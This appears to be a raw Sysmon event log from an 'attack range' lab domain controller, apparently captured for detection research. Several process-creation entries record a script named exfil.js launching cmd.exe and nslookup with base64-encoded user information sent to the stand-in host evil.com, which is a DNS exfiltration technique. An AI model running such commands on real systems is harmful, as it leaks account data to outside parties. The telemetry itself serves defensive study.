14:21:55.588{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.588{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.588{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.588{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-D146-000000005F02}5628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.572{2E1864BB-1903-629A-CF46-000000005F02}67602032C:\Windows\system32\cmd.exe{2E1864BB-1903-629A-D146-000000005F02}5628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.587{2E1864BB-1903-629A-D146-000000005F02}5628C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1903-629A-CF46-000000005F02}6760C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxwq.tmp 2>&1 354300x8000000000000000216868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.026{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51435- 10341000x8000000000000000216867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.541{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1903-629A-D046-000000005F02}6032C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.541{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1903-629A-D046-000000005F02}6032C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.541{2E1864BB-1903-629A-D046-000000005F02}60327948C:\Windows\system32\conhost.exe{2E1864BB-1903-629A-CF46-000000005F02}6760C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.526{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-D046-000000005F02}6032C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.510{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.510{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.510{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-CF46-000000005F02}6760C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.510{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.510{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.510{2E1864BB-18E0-629A-6742-000000005F02}39765944C:\Windows\System32\WScript.exe{2E1864BB-1903-629A-CF46-000000005F02}6760C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.516{2E1864BB-1903-629A-CF46-000000005F02}6760C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxwq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.510{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqlks.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.472{2E1864BB-1903-629A-CD46-000000005F02}29328000C:\Windows\system32\conhost.exe{2E1864BB-1903-629A-CE46-000000005F02}7532C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.472{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.472{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.472{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-CE46-000000005F02}7532C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.472{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.472{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.472{2E1864BB-1903-629A-CC46-000000005F02}27048008C:\Windows\system32\cmd.exe{2E1864BB-1903-629A-CE46-000000005F02}7532C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.476{2E1864BB-1903-629A-CE46-000000005F02}7532C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1903-629A-CC46-000000005F02}2704C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqlks.tmp 2>&1 10341000x8000000000000000216847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.441{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1903-629A-CD46-000000005F02}2932C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.441{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1903-629A-CD46-000000005F02}2932C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.426{2E1864BB-1903-629A-CD46-000000005F02}29328000C:\Windows\system32\conhost.exe{2E1864BB-1903-629A-CC46-000000005F02}2704C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.410{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-CD46-000000005F02}2932C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.408{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-CC46-000000005F02}2704C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.408{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 